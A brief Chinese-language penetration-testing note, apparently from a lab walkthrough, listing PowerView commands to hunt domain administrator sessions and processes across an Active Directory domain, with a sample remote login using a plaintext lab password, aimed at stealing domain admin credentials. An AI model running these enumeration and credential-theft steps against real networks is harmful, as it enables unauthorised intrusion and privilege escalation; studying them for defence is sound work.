使用:Import-Module .\powerview.ps1
查看域管用戶如下:
定位域管登錄過哪台域機器,獲取netsession:Invoke-UserHunter
獲得netsession建立情況:Get-Netsession
枚舉遠程機器的tasklists和進程尋找目標用戶:Invoke-ProcessHunter -Username sqladmin
獲取遠程服務器的進程用戶,查看是否有域管進程,可以憑證竊取域管權限,傳遞遠程服務器域用戶(是該遠程服務器的管理員):Get-NetProcess -Computer 192.168.3.68 -RemoteUserName 0day.org\sqladmin -RemotePassword admin!@#45
獲取到域管進程、其他用戶進程如下:
